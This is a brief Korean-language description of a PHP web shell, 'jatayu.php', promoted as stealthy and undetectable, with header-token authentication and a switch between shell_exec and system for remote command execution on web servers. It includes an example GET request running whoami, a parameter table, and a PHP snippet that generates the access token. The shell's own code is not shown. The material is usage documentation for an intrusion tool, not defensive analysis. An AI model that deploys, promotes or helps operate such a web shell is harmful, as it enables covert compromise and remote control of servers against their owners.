
은밀한 독립형 PHP 웹 셸: HTTP 헤더 기반 인증, exec 함수 전환, 탐지 불가능한 설계로 웹 서버에서 원격 명령 실행을 지원합니다.
GET /test/jatayu.php?fn=1&&cmd=whoami
Host : http://test.com
Authtoken : bb3b1a1f-0447-42a6-955a-88681fb88499
| 매개변수 | 기능 |
|---|---|
| fn=1 | shell_exec() 함수 호출 |
| fn=2 | system() 함수 호출 |
| cmd=id | 명령 실행 |
<?php
$r = unpack('v*', fread(fopen('/dev/random', 'r'),16));
$apiKey = sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x',
$r[1], $r[2], $r[3], $r[4] & 0x0fff | 0x4000,
$r[5] & 0x3fff | 0x8000, $r[6], $r[7], $r[8]);
echo $apiKey;
?>